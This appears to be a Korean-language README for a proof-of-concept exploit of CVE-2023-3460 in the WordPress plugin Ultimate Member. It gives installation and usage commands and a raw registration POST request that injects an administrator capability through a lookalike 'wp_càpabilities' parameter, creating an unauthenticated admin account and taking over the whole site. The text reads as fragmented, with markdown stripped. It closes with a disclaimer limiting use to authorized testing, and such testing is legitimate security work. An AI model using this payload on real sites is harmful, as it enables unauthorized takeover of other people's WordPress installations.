
이것은 WordPress 플러그인 Ultimate Member의 치명적인 취약점인 CVE-2023-3460에 대한 개념 증명(PoC) 익스플로잇입니다. 이 취약점을 통해 인증되지 않은 사용자는 악의적인 등록 요청을 구성하여 자신의 권한을 관리자로 상승시킬 수 있습니다.
🔥 영향: 인증되지 않은 관리자 계정 생성으로 인한 전체 사이트 장악.
requests 라이브러리urllib3 라이브러리beautifulsoup4 라이브러리요구 사항 설치:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce)를 가져옴wp_capabilities에 administrator 역할 주입POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
이 스크립트는 교육 및 승인된 테스트 목적으로만 제공됩니다. 승인되지 않은 시스템 악용은 불법적이고 비윤리적입니다. 오직 소유하고 있거나 테스트 권한이 있는 시스템에서만 사용하십시오.